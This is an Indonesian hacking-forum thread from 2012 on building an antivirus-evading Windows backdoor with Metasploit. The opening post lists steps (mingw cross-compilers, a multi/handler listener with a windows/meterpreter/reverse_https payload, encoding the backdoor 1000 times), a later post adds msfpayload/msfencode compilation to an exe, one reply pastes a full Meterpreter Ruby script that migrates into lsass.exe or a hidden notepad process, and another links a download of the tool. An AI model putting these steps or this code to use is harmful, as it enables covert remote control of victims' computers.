Membuat backdoor undetectable di Metasploit Framework
#1
oke langsung aj. di pagi yang sebohay ini saya akan melakukan enkripsi backdoors dengan menggunakan metasploit framework di Backtrack 5!


Pertama, install ni:
" apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils "

jalanin metasploit framework console, gunakan exploit/multi/handler method, dan set payload windows/meterpreter/reverse_https.Ini merupakan langkah untuk menggunakan script ‘launch_and_migrate.rb’, jadi kita bisa pidah ke proses berikutnya setelah kita dapat peluang. Kita encoded backdoornya 1000 kali sampai tidak stabil.

untuk sciptnya bisa PM ke saya dengan mencantumkan email anda..

semoga dapat membantu...

thxs...



#2
Om mahong cara kerjanya tolong di jelaskan secara rinci
atau bagi link dari techdicdynamic

#3
lha iya jangan pelit-pelit dong om share langsung aja disini (terbuka)
Every one Have Superiority that you don't know..

#4
ini tinggal memadukan antara msfpayload dan msfencode untuk membuat backdoor.c kok .. kemudian nntinya di compile dengan gcc-mingw32 untuk di jadikan exe ... untuk menghormati TS silahkan email ke TS yang mau ambil auto scriptnya .. sy mau bawa seminar dulu di krawang insyaallah selesai seminar nnti malam saya coba posting yang manualnya .. makasih
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#5
Smile 
(10-19-2012, 08:33 AM)mahong Wrote: oke langsung aj. di pagi yang sebohay ini saya akan melakukan enkripsi backdoors dengan menggunakan metasploit framework di Backtrack 5!


Pertama, install ni:
" apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils "

jalanin metasploit framework console, gunakan exploit/multi/handler method, dan set payload windows/meterpreter/reverse_https.Ini merupakan langkah untuk menggunakan script ‘launch_and_migrate.rb’, jadi kita bisa pidah ke proses berikutnya setelah kita dapat peluang. Kita encoded backdoornya 1000 kali sampai tidak stabil.

untuk sciptnya bisa PM ke saya dengan mencantumkan email anda..

semoga dapat membantu...

thxs...
bener nggak bang ?
Code:
# $Id$
#
# Simple example script that migrates to a specific process by name.
# This is meant as an illustration.
#

spawn = false
target = nil

opts = Rex::Parser::Arguments.new(
        "-h" => [ false,"Help menu." ],
        "-f" => [ false, "Launch a process and migrate into the new process"]
)
opts.parse(args) { |opt, idx, val|
        case opt
        when "-f"
                spawn = true
        when "-h"
                print_line("")
                print_line("USAGE:   run migrate [process name]")
                print_line("EXAMPLE: run migrate explorer.exe")
                print_line(opts.usage)
                raise Rex::Script::Completed
        else
                target = val
        end
}



if client.platform =~ /win32|win64/
        server = client.sys.process.open

        print_status("Current server process: #{server.name} (#{server.pid})")

        target_pid = nil

        if ! spawn
                # Get the target process name
                target ||= "lsass.exe"
                print_status("Migrating to #{target}...")

                # Get the target process pid
                target_pid = client.sys.process[target]

                if not target_pid
                        print_error("Could not access the target process")
                        print_status("Spawning a notepad.exe host process...")
                        note = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
                        target_pid = note.pid
                end
        else
                target ||= "notepad.exe"
                print_status("Spawning a #{target} host process...")
                newproc = client.sys.process.execute(target, nil, {'Hidden' => true })
                target_pid = newproc.pid
                if not target_pid
                        print_error("Could not create a process around #{target}")
                        raise Rex::Script::Completed
                end
        end

        # Do the migration
        print_status("Migrating into process ID #{target_pid}")
        client.core.migrate(target_pid)
        server = client.sys.process.open
        print_status("New server process: #{server.name} (#{server.pid})")

else
        print_error("This version of Meterpreter is not supported with this Script!")
        raise Rex::Script::Completed
end
SENJA INI

#6
up dulu deh om, msih nunggu pnjelasan ttg script ruby ny...

#7
ne om ane udah dapat videonya

http://www.youtube.com/watch?feature=pla...Rl5Hx5ouS4

gmn indonesia maju kalu ilmunya gak mau di sharing

download file nya di sini om om

http://technicdynamic.com/wp-content/upl...topsbd.zip

#8
mksih om dvil,,, TS ny kmn y... Big Grin

#9
(10-22-2012, 10:12 PM)dvil Wrote: ne om ane udah dapat videonya

http://www.youtube.com/watch?feature=pla...Rl5Hx5ouS4

gmn indonesia maju kalu ilmunya gak mau di sharing

download file nya di sini om om

http://technicdynamic.com/wp-content/upl...topsbd.zip

btul bgt bro... kenapa harus pakai PM
_________________________________________________
[noe404] [@noezz]
I have no special talents,, I'm only passionatetely curious...
_________________________________________________

#10
maaf ni Om mahong, tolong jelasin steb by steb nya, jgn main rahasia2'an, toh ini kan forum bersama, buat apa di share kalo cuma ingin mempamerkan kemampuan.
skali lg ane minta maap Smile






Users browsing this thread: 1 Guest(s)